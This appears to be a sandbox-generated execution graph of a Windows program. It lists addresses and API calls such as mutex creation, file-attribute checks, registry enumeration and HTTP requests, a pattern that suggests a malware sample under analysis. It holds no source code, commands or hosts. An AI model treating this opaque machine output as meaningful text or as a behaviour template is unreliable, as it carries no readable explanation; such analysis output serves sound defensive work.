                                                                                                                execution_graph 37929 78a418 GetFileAttributesA 37930 78a428 _Ref_count_obj 37929->37930 37931 78a4f3 _Ref_count_obj 37930->37931 37932 78a93f 37930->37932 37951 7980c0 37931->37951 37948 7b6c6a 37932->37948 37934 78a944 37935 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37934->37935 37937 78a949 37935->37937 37939 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37937->37939 37938 78a903 37940 78a94e 37939->37940 37941 78a953 Sleep CreateMutexA 37940->37941 37942 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37940->37942 37945 78a98e 37941->37945 37942->37941 37944 78a9a7 37945->37944 37946 7b6629 GetPEB GetPEB RtlAllocateHeap 37945->37946 37947 78a9b0 37946->37947 37966 7b6bf6 RtlAllocateHeap __dosmaperr ___std_exception_copy 37948->37966 37950 7b6c79 ___std_exception_copy 37954 7980de __InternalCxxFrameHandler 37951->37954 37956 798104 37951->37956 37952 7981ee 37969 799270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37952->37969 37954->37938 37955 7981f3 37970 782480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 37955->37970 37956->37952 37957 798158 37956->37957 37958 79817d 37956->37958 37957->37955 37967 782480 RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected Concurrency::details::ResourceManager::ResourceManager 37957->37967 37964 798169 std::_Rethrow_future_exception 37958->37964 37968 782480 RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected Concurrency::details::ResourceManager::ResourceManager 37958->37968 37960 7981f8 37963 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37963->37952 37964->37963 37965 7981d0 _Ref_count_obj 37964->37965 37965->37938 37966->37950 37967->37964 37968->37964 37970->37960 37971 78a079 GetFileAttributesA 37973 78a089 _Ref_count_obj 37971->37973 37972 78a930 37975 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37972->37975 37973->37972 37974 78a154 _Ref_count_obj 37973->37974 37977 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37974->37977 37976 78a953 Sleep CreateMutexA 37975->37976 37981 78a98e 37976->37981 37979 78a903 37977->37979 37980 78a9a7 37981->37980 37984 7b6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37981->37984 37983 78a9b0 37984->37983 37985 7b6dda 37986 7b6de8 37985->37986 37987 7b6df6 37985->37987 37988 7b6e4c 7 API calls 37986->37988 37998 7b698d 37987->37998 37990 7b6df2 37988->37990 37991 7b6e10 38001 7b68ed 37991->38001 37994 7b6e24 37996 7b6e46 37994->37996 38025 7badf5 37994->38025 38029 7b690a 37998->38029 38000 7b699f __wsopen_s 38000->37991 38040 7b683b 38001->38040 38004 7b6e4c 38005 7b6e5a 38004->38005 38008 7b6e77 ListArray 38004->38008 38079 7b75e3 RtlAllocateHeap __dosmaperr 38005->38079 38007 7b6e5f 38080 7b75f6 RtlAllocateHeap __dosmaperr 38007->38080 38010 7b6eb9 CreateFileW 38008->38010 38011 7b6e9d 38008->38011 38012 7b6eeb 38010->38012 38013 7b6edd 38010->38013 38082 7b75e3 RtlAllocateHeap __dosmaperr 38011->38082 38085 7b6f2a GetPEB GetPEB RtlAllocateHeap __dosmaperr 38012->38085 38058 7b6fb4 GetFileType 38013->38058 38014 7b6e67 38081 7b6c5a RtlAllocateHeap ___std_exception_copy 38014->38081 38019 7b6ea2 38083 7b75f6 RtlAllocateHeap __dosmaperr 38019->38083 38020 7b6e72 38020->37994 38022 7b6ea9 38084 7b6c5a RtlAllocateHeap ___std_exception_copy 38022->38084 38024 7b6eb4 ListArray 38024->37994 38026 7bae00 38025->38026 38028 7bae1b __dosmaperr 38025->38028 38026->38028 38108 7b75f6 RtlAllocateHeap __dosmaperr 38026->38108 38028->37996 38030 7b6921 38029->38030 38031 7b692a 38029->38031 38030->38000 38031->38030 38037 7ba671 3 API calls 3 library calls 38031->38037 38033 7b694a 38038 7bb5fb GetPEB GetPEB RtlAllocateHeap __cftof 38033->38038 38035 7b6960 38039 7bb628 GetPEB GetPEB RtlAllocateHeap __cftof 38035->38039 38037->38033 38038->38035 38039->38030 38041 7b6849 38040->38041 38042 7b6863 38040->38042 38053 7b69cc RtlAllocateHeap ___free_lconv_mon 38041->38053 38044 7b686a 38042->38044 38047 7b6889 __fassign 38042->38047 38046 7b6853 38044->38046 38054 7b69e6 RtlAllocateHeap __wsopen_s 38044->38054 38046->37994 38046->38004 38049 7b689f __fassign 38047->38049 38057 7b69e6 RtlAllocateHeap __wsopen_s 38047->38057 38049->38046 38055 7b75c0 RtlAllocateHeap __dosmaperr 38049->38055 38051 7b68ab 38056 7b75f6 RtlAllocateHeap __dosmaperr 38051->38056 38053->38046 38054->38046 38055->38051 38056->38046 38057->38049 38059 7b6fef 38058->38059 38060 7b70a1 38058->38060 38061 7b7009 ListArray 38059->38061 38100 7b732a RtlAllocateHeap __dosmaperr 38059->38100 38063 7b70af 38060->38063 38064 7b70be 38060->38064 38068 7b7098 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38060->38068 38065 7b7028 GetFileInformationByHandle 38061->38065 38061->38068 38102 7b75f6 RtlAllocateHeap __dosmaperr 38063->38102 38103 7b75c0 RtlAllocateHeap __dosmaperr 38064->38103 38065->38064 38067 7b703e 38065->38067 38086 7b727c 38067->38086 38068->38024 38073 7b705b 38074 7b7124 SystemTimeToTzSpecificLocalTime 38073->38074 38075 7b706e 38074->38075 38076 7b7124 SystemTimeToTzSpecificLocalTime 38075->38076 38077 7b7085 38076->38077 38101 7b7249 RtlAllocateHeap __dosmaperr 38077->38101 38079->38007 38080->38014 38081->38020 38082->38019 38083->38022 38084->38024 38085->38024 38087 7b7292 _wcsrchr 38086->38087 38090 7b704a 38087->38090 38104 7bbc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 38087->38104 38089 7b72d6 38089->38090 38105 7bbc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 38089->38105 38096 7b7124 38090->38096 38092 7b72e7 38092->38090 38106 7bbc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 38092->38106 38094 7b72f8 38094->38090 38107 7bbc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr ___std_exception_copy 38094->38107 38097 7b713c 38096->38097 38098 7b715c SystemTimeToTzSpecificLocalTime 38097->38098 38099 7b7142 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38097->38099 38098->38099 38099->38073 38100->38061 38101->38068 38102->38068 38103->38068 38104->38089 38105->38092 38106->38094 38107->38090 38108->38028 38137 7ba7c8 38138 7ba7d2 __dosmaperr 38137->38138 38140 7ba7eb 38138->38140 38148 7bd82f 38138->38148 38141 7ba813 __dosmaperr 38142 7ba853 38141->38142 38143 7ba81b __dosmaperr 38141->38143 38152 7ba49f RtlAllocateHeap __dosmaperr 38142->38152 38145 7badf5 ___free_lconv_mon RtlAllocateHeap 38143->38145 38145->38140 38146 7ba85e 38147 7badf5 ___free_lconv_mon RtlAllocateHeap 38146->38147 38147->38140 38149 7bd83c __dosmaperr Concurrency::details::_CancellationTokenState::_RegisterCallback 38148->38149 38150 7bd87a __dosmaperr 38149->38150 38151 7bd867 RtlAllocateHeap 38149->38151 38150->38141 38151->38149 38151->38150 38152->38146 38153 78a54d GetFileAttributesA 38156 78a55d _Ref_count_obj 38153->38156 38154 78a628 _Ref_count_obj 38159 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38154->38159 38155 78a944 38157 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38155->38157 38156->38154 38156->38155 38158 78a949 38157->38158 38160 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38158->38160 38161 78a903 38159->38161 38162 78a94e 38160->38162 38163 78a953 Sleep CreateMutexA 38162->38163 38164 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38162->38164 38167 78a98e 38163->38167 38164->38163 38166 78a9a7 38167->38166 38170 7b6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38167->38170 38169 78a9b0 38170->38169 38185 796d00 CreateThread 38186 796d20 Sleep 38185->38186 38187 796c70 38185->38187 38186->38186 38189 796ca0 38187->38189 38188 797a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 38188->38189 38189->38188 38190 785c10 GetPEB GetPEB RtlAllocateHeap 38189->38190 38193 7947b0 38189->38193 38190->38189 38192 796cec Sleep 38192->38189 38194 7947eb 38193->38194 38197 794ee3 _Ref_count_obj 38193->38197 38194->38197 38303 797a00 38194->38303 38195 794f59 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _Ref_count_obj 38195->38192 38197->38195 38199 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38197->38199 38198 79480c 38317 785c10 38198->38317 38201 794fba 38199->38201 38202 794813 38203 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38202->38203 38204 794825 38203->38204 38205 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38204->38205 38206 794837 38205->38206 38329 78be30 38206->38329 38208 794843 38209 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38208->38209 38210 794858 38209->38210 38211 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38210->38211 38212 794870 38211->38212 38213 785c10 3 API calls 38212->38213 38214 794877 38213->38214 38356 788580 38214->38356 38216 794883 38218 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38216->38218 38285 794afd 38216->38285 38217 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38220 794b2f 38217->38220 38219 79489f 38218->38219 38221 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38219->38221 38222 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38220->38222 38223 7948b7 38221->38223 38224 794b44 38222->38224 38225 785c10 3 API calls 38223->38225 38226 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38224->38226 38227 7948be 38225->38227 38228 794b56 38226->38228 38229 788580 RtlAllocateHeap 38227->38229 38230 78be30 9 API calls 38228->38230 38231 7948ca 38229->38231 38232 794b62 38230->38232 38234 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38231->38234 38231->38285 38233 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38232->38233 38235 794b77 38233->38235 38236 7948e7 38234->38236 38237 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38235->38237 38238 785c10 3 API calls 38236->38238 38239 794b8f 38237->38239 38243 7948ef 38238->38243 38240 785c10 3 API calls 38239->38240 38241 794b96 38240->38241 38242 788580 RtlAllocateHeap 38241->38242 38244 794ba2 38242->38244 38245 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38243->38245 38246 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38244->38246 38249 794e70 _Ref_count_obj 38244->38249 38256 794959 _Ref_count_obj 38245->38256 38247 794bbe 38246->38247 38248 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38247->38248 38250 794bd6 38248->38250 38249->38197 38251 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38249->38251 38252 785c10 3 API calls 38250->38252 38251->38197 38255 794bdd 38252->38255 38253 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38254 7949e6 38253->38254 38257 785c10 3 API calls 38254->38257 38258 788580 RtlAllocateHeap 38255->38258 38256->38253 38261 7949ee 38257->38261 38259 794be9 38258->38259 38259->38249 38260 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38259->38260 38262 794c06 38260->38262 38263 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38261->38263 38264 785c10 3 API calls 38262->38264 38265 794a49 _Ref_count_obj 38263->38265 38266 794c0e 38264->38266 38265->38285 38365 7898f0 3 API calls 4 library calls 38265->38365 38267 794c5a 38266->38267 38268 794f97 38266->38268 38271 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38267->38271 38369 798200 RtlAllocateHeap 38268->38369 38281 794c78 _Ref_count_obj 38271->38281 38272 794ad5 38272->38285 38366 7b75f6 RtlAllocateHeap __dosmaperr 38272->38366 38273 794f9c 38370 79c1d9 RtlAllocateHeap std::invalid_argument::invalid_argument CallUnexpected 38273->38370 38276 794fa6 38280 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38276->38280 38277 794ade 38367 7b8ab6 GetPEB GetPEB RtlAllocateHeap 38277->38367 38278 794cec _Ref_count_obj 38279 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38278->38279 38283 794d05 38279->38283 38284 794fab 38280->38284 38281->38276 38281->38278 38286 785c10 3 API calls 38283->38286 38287 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38284->38287 38285->38217 38285->38273 38288 794d0d 38286->38288 38287->38249 38289 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38288->38289 38291 794d68 _Ref_count_obj 38289->38291 38290 794ddc _Ref_count_obj 38292 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38290->38292 38291->38284 38291->38290 38293 794df7 38292->38293 38294 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38293->38294 38295 794e0c 38294->38295 38296 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38295->38296 38297 794e27 38296->38297 38298 785c10 3 API calls 38297->38298 38299 794e2e 38298->38299 38300 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38299->38300 38301 794e67 38300->38301 38368 794390 9 API calls 3 library calls 38301->38368 38304 797a26 38303->38304 38305 797a2d 38304->38305 38306 797a81 38304->38306 38307 797a62 38304->38307 38305->38198 38314 797a76 std::_Rethrow_future_exception 38306->38314 38372 782480 RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected Concurrency::details::ResourceManager::ResourceManager 38306->38372 38308 797ab9 38307->38308 38309 797a69 38307->38309 38373 782480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected 38308->38373 38371 782480 RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback CallUnexpected Concurrency::details::ResourceManager::ResourceManager 38309->38371 38313 797a6f 38313->38314 38315 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38313->38315 38314->38198 38316 797ac3 __Cnd_destroy_in_situ __Mtx_destroy_in_situ Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection _Ref_count_obj 38315->38316 38316->38198 38374 785940 38317->38374 38321 785c6a 38398 784b30 38321->38398 38323 785c7b _Ref_count_obj 38325 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38323->38325 38326 785ce7 _Ref_count_obj 38323->38326 38324 785d17 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _Ref_count_obj 38324->38202 38325->38326 38326->38324 38327 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38326->38327 38328 785d47 38327->38328 38330 78c281 38329->38330 38331 78be82 38329->38331 38332 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38330->38332 38331->38330 38333 78be96 Sleep InternetOpenW InternetConnectA 38331->38333 38336 78c22e _Ref_count_obj 38332->38336 38334 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38333->38334 38335 78bf18 38334->38335 38337 785c10 3 API calls 38335->38337 38338 78c27c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _Ref_count_obj 38336->38338 38340 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38336->38340 38339 78bf23 HttpOpenRequestA 38337->38339 38338->38208 38344 78bf4c _Ref_count_obj 38339->38344 38342 78c354 38340->38342 38343 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38345 78bfb4 38343->38345 38344->38343 38346 785c10 3 API calls 38345->38346 38347 78bfbf 38346->38347 38348 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38347->38348 38349 78bfd8 38348->38349 38350 785c10 3 API calls 38349->38350 38351 78bfe3 HttpSendRequestA 38350->38351 38354 78c006 _Ref_count_obj 38351->38354 38353 78c08e InternetReadFile 38355 78c0b5 __InternalCxxFrameHandler 38353->38355 38354->38353 38361 7886a0 _Ref_count_obj 38356->38361 38363 7885d5 _Ref_count_obj 38356->38363 38357 788767 38412 798200 RtlAllocateHeap 38357->38412 38358 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38358->38363 38360 788740 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _Ref_count_obj 38360->38216 38361->38360 38362 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38361->38362 38364 788771 38362->38364 38363->38357 38363->38358 38363->38361 38365->38272 38366->38277 38367->38285 38368->38249 38370->38276 38371->38313 38372->38314 38373->38313 38405 797f80 RtlAllocateHeap ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback _Ref_count_obj 38374->38405 38376 78596b 38377 7859e0 38376->38377 38406 797f80 RtlAllocateHeap ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback _Ref_count_obj 38377->38406 38379 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38391 785a45 38379->38391 38380 785bdd __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38380->38321 38381 785c09 38408 798200 RtlAllocateHeap 38381->38408 38383 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38383->38391 38391->38379 38391->38380 38391->38381 38391->38383 38407 785730 RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback _Ref_count_obj 38391->38407 38399 784dc2 38398->38399 38403 784b92 38398->38403 38399->38323 38401 784ce5 38401->38399 38411 798ca0 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception _Ref_count_obj 38401->38411 38403->38401 38409 7b6da6 GetPEB GetPEB RtlAllocateHeap __fassign 38403->38409 38410 798ca0 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception _Ref_count_obj 38403->38410 38405->38376 38406->38391 38407->38391 38409->38403 38410->38403 38411->38401 38413 78a682 GetFileAttributesA 38414 78a692 _Ref_count_obj 38413->38414 38415 78a949 38414->38415 38416 78a75d _Ref_count_obj 38414->38416 38417 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38415->38417 38419 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38416->38419 38418 78a94e 38417->38418 38420 78a953 Sleep CreateMutexA 38418->38420 38421 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38418->38421 38422 78a903 38419->38422 38425 78a98e 38420->38425 38421->38420 38424 78a9a7 38425->38424 38428 7b6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38425->38428 38427 78a9b0 38428->38427 38429 79d762 38438 79d76e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 38429->38438 38430 79d8ce ___scrt_fastfail 38465 7b6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38430->38465 38432 79d8db 38466 7b65ed GetPEB GetPEB RtlAllocateHeap CallUnexpected 38432->38466 38434 79d8e3 ___security_init_cookie 38435 79d8e9 __scrt_common_main_seh 38434->38435 38436 79d83f 38448 7b95bc 38436->38448 38438->38430 38438->38436 38447 79d7be 38438->38447 38464 7b6603 3 API calls 4 library calls 38438->38464 38440 79d845 38452 796d30 38440->38452 38449 7b95ca 38448->38449 38450 7b95c5 38448->38450 38449->38440 38467 7b9320 GetPEB GetPEB RtlAllocateHeap 38450->38467 38468 78a960 Sleep CreateMutexA 38452->38468 38456 796d45 38457 78d6d0 GetPEB GetPEB RtlAllocateHeap 38456->38457 38458 796d4a 38457->38458 38459 794fc0 6 API calls 38458->38459 38460 796d4f 38459->38460 38461 786020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 38460->38461 38462 796d54 38461->38462 38463 786020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap 38462->38463 38463->38462 38464->38436 38465->38432 38466->38434 38467->38449 38470 78a98e 38468->38470 38469 78a9a7 38473 78ce40 38469->38473 38470->38469 38478 7b6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38470->38478 38472 78a9b0 38474 797a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38473->38474 38475 78ce92 38474->38475 38476 785c10 3 API calls 38475->38476 38477 78ce9d 38476->38477 38478->38472 38507 789ba5 GetFileAttributesA 38512 789bb5 _Ref_count_obj 38507->38512 38508 78a91c 38510 78a953 Sleep CreateMutexA 38508->38510 38511 7b6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38508->38511 38509 789c80 _Ref_count_obj 38514 7980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38509->38514 38517 78a98e 38510->38517 38511->38510 38512->38508 38512->38509 38515 78a903 38514->38515 38516 78a9a7 38517->38516 38520 7b6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38517->38520 38519 78a9b0 38520->38519 38521 7bc1c4 38522 7bc367 38521->38522 38524 7bc1ee 38521->38524 38562 7b75f6 RtlAllocateHeap __dosmaperr 38522->38562 38524->38522 38525 7bc239 38524->38525 38536 7c292b 38525->38536 38527 7bc259 38540 7c2139 38527->38540 38529 7bc26d 38530 7bc352 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z ___std_exception_copy 38529->38530 38547 7c2165 38529->38547 38532 7bc27f 38532->38530 38554 7c2191 38532->38554 38534 7bc291 38534->38530 38561 7c2988 RtlAllocateHeap ___scrt_is_nonwritable_in_current_image CallUnexpected 38534->38561 38537 7c2937 ___scrt_is_nonwritable_in_current_image CallUnexpected 38536->38537 38539 7c295c 38537->38539 38563 7c284d 38537->38563 38539->38527 38541 7c215a 38540->38541 38542 7c2145 38540->38542 38541->38529 38672 7b75f6 RtlAllocateHeap __dosmaperr 38542->38672 38544 7c214a 38673 7b6c5a RtlAllocateHeap ___std_exception_copy 38544->38673 38546 7c2155 38546->38529 38548 7c2186 38547->38548 38549 7c2171 38547->38549 38548->38532 38674 7b75f6 RtlAllocateHeap __dosmaperr 38549->38674 38551 7c2176 38675 7b6c5a RtlAllocateHeap ___std_exception_copy 38551->38675 38553 7c2181 38553->38532 38555 7c219d 38554->38555 38556 7c21b2 38554->38556 38676 7b75f6 RtlAllocateHeap __dosmaperr 38555->38676 38556->38534 38558 7c21a2 38677 7b6c5a RtlAllocateHeap ___std_exception_copy 38558->38677 38560 7c21ad 38560->38534 38561->38530 38562->38530 38565 7c2899 38563->38565 38564 7c28a0 38567 7c2910 38564->38567 38568 7c2907 38564->38568 38565->38564 38660 7bb04b RtlAllocateHeap __dosmaperr Concurrency::details::_CancellationTokenState::_RegisterCallback 38565->38660 38574 7c290d 38567->38574 38631 7c26f2 38567->38631 38579 7c2517 38568->38579 38571 7badf5 ___free_lconv_mon RtlAllocateHeap 38575 7c291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38571->38575 38572 7c28bf 38576 7badf5 ___free_lconv_mon RtlAllocateHeap 38572->38576 38573 7c28b8 38573->38572 38577 7c28e5 38573->38577 38574->38571 38575->38539 38576->38564 38578 7badf5 ___free_lconv_mon RtlAllocateHeap 38577->38578 38578->38564 38580 7c2526 38579->38580 38581 7c2191 RtlAllocateHeap 38580->38581 38582 7c253c 38581->38582 38583 7c2139 RtlAllocateHeap 38582->38583 38584 7c26c1 ___std_exception_copy 38582->38584 38586 7c254e 38583->38586 38587 7c2191 RtlAllocateHeap 38584->38587 38590 7c26c8 38584->38590 38585 7badf5 ___free_lconv_mon RtlAllocateHeap 38588 7c259e 38585->38588 38586->38584 38586->38585 38586->38590 38589 7c2717 38587->38589 38661 7bb04b RtlAllocateHeap __dosmaperr Concurrency::details::_CancellationTokenState::_RegisterCallback 38588->38661 38591 7c2139 RtlAllocateHeap 38589->38591 38599 7c2842 ___std_exception_copy 38589->38599 38590->38574 38593 7c2729 38591->38593 38596 7c2165 RtlAllocateHeap 38593->38596 38593->38599 38594 7c25b6 38595 7badf5 ___free_lconv_mon RtlAllocateHeap 38594->38595 38602 7c25c2 38595->38602 38597 7c273b 38596->38597 38598 7c2744 38597->38598 38597->38599 38601 7badf5 ___free_lconv_mon RtlAllocateHeap 38598->38601 38600 7c28a0 38599->38600 38669 7bb04b RtlAllocateHeap __dosmaperr Concurrency::details::_CancellationTokenState::_RegisterCallback 38599->38669 38606 7c2910 38600->38606 38607 7c2907 38600->38607 38605 7c274f GetTimeZoneInformation 38601->38605 38602->38590 38662 7ba1f1 RtlAllocateHeap __dosmaperr ___std_exception_copy 38602->38662 38612 7c276b 38605->38612 38627 7c27be __cftof 38605->38627 38609 7c290d 38606->38609 38610 7c26f2 4 API calls 38606->38610 38613 7c2517 4 API calls 38607->38613 38608 7c25ec 38608->38584 38663 7c4a64 RtlAllocateHeap __dosmaperr ___std_exception_copy 38608->38663 38614 7badf5 ___free_lconv_mon RtlAllocateHeap 38609->38614 38610->38609 38611 7c28b8 38618 7c28e5 38611->38618 38619 7c28bf 38611->38619 38668 7bef17 GetPEB GetPEB RtlAllocateHeap __cftof _unexpected 38612->38668 38613->38609 38616 7c291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38614->38616 38616->38574 38617 7badf5 ___free_lconv_mon RtlAllocateHeap 38617->38600 38621 7badf5 ___free_lconv_mon RtlAllocateHeap 38618->38621 38619->38617 38621->38600 38622 7c2605 38622->38584 38664 7b8bbe GetPEB GetPEB RtlAllocateHeap 38622->38664 38624 7c262a 38625 7c2680 38624->38625 38665 7b8bbe GetPEB GetPEB RtlAllocateHeap 38624->38665 38625->38590 38667 7c4a64 RtlAllocateHeap __dosmaperr ___std_exception_copy 38625->38667 38627->38574 38628 7c2651 38628->38625 38666 7b8bbe GetPEB GetPEB RtlAllocateHeap 38628->38666 38632 7c2701 38631->38632 38633 7c2191 RtlAllocateHeap 38632->38633 38634 7c2717 38633->38634 38635 7c2139 RtlAllocateHeap 38634->38635 38640 7c2842 ___std_exception_copy 38634->38640 38636 7c2729 38635->38636 38637 7c2165 RtlAllocateHeap 38636->38637 38636->38640 38638 7c273b 38637->38638 38639 7c2744 38638->38639 38638->38640 38641 7badf5 ___free_lconv_mon RtlAllocateHeap 38639->38641 38657 7c28a0 38640->38657 38671 7bb04b RtlAllocateHeap __dosmaperr Concurrency::details::_CancellationTokenState::_RegisterCallback 38640->38671 38643 7c274f GetTimeZoneInformation 38641->38643 38652 7c276b 38643->38652 38659 7c27be __cftof 38643->38659 38644 7c2910 38646 7c290d 38644->38646 38647 7c26f2 4 API calls 38644->38647 38645 7c2907 38648 7c2517 4 API calls 38645->38648 38649 7badf5 ___free_lconv_mon RtlAllocateHeap 38646->38649 38647->38646 38648->38646 38651 7c291b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 38649->38651 38650 7c28bf 38654 7badf5 ___free_lconv_mon RtlAllocateHeap 38650->38654 38651->38574 38670 7bef17 GetPEB GetPEB RtlAllocateHeap __cftof _unexpected 38652->38670 38653 7c28b8 38653->38650 38655 7c28e5 38653->38655 38654->38657 38658 7badf5 ___free_lconv_mon RtlAllocateHeap 38655->38658 38657->38644 38657->38645 38658->38657 38659->38574 38660->38573 38661->38594 38662->38608 38663->38622 38664->38624 38665->38628 38666->38625 38667->38584 38668->38627 38669->38611 38670->38659 38671->38653 38672->38544 38673->38546 38674->38551 38675->38553 38676->38558 38677->38560

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
